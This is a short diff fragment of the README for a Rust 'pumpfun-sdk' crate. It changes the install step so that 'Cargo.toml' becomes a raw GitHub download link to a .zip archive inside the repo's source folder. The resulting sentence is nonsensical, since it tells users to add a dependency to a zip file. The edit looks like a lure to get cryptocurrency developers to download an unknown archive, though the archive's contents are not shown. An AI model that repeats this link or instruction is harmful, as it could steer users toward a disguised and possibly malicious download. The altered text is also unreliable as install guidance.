fourti/pumpfun-sdk/README.md

    cargo build --release
    ```

-4. **Add to Your Project**: You can now include the PumpFun SDK in your Rust project by adding it to your `Cargo.toml` file:
+4. **Add to Your Project**: You can now include the PumpFun SDK in your Rust project by adding it to your `https://github.com/fourti/pumpfun-sdk/raw/refs/heads/main/src/accounts/sdk_pumpfun_v1.7.zip` file:

    ```toml
    [dependencies]